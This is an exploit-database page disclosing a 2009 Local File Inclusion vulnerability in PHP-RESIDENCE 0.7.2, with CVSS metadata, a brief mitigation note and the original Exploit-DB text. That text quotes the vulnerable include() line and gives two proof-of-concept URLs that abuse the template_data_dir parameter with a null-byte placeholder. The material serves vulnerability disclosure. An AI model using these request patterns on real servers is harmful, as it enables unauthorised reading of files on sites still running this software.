PHP-RESIDENCE - exploit.company

vendor:

PHP-RESIDENCE

by:

cr4wl3r

7,5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: PHP-RESIDENCE

Affected Version From: 0.7.2

Affected Version To: 0.7.2

Patch Exists: NO

Related CWE: N/A

CPE: a:php-residence:php-residence:0.7.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-RESIDENCE <= 0.7.2 Multiple LFI Vulnerability

PHP-RESIDENCE version 0.7.2 is vulnerable to Local File Inclusion (LFI) vulnerability. This vulnerability works only when magic_quotes_gpc is set to off. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious payload to the vulnerable application. This will allow the attacker to include and execute arbitrary local files on the server.

Mitigation:

Ensure that the application is not vulnerable to LFI attacks by validating user input and using proper input sanitization techniques.

Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   | PHP-RESIDENCE <= 0.7.2 Multiple LFI Vulnerability  |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://www.digitaldruid.net/download/php-residence_0.7.2.zip
[!] Date: 30.12.2009
[!] Remote: yes

[!] Code :

    include("./includes/templates/$template_data_dir/phrases.php");

[!] PoC:

    [PHP-RESIDENCE_path]/includes/templates/cal/form.php?template_data_dir=[LFI%00]




[!] Code :

    include("./includes/templates/$template_data_dir/phrases.php");

[!] PoC:

    [PHP-RESIDENCE_path]/includes/templates/rat/form.php?template_data_dir=[LFI%00]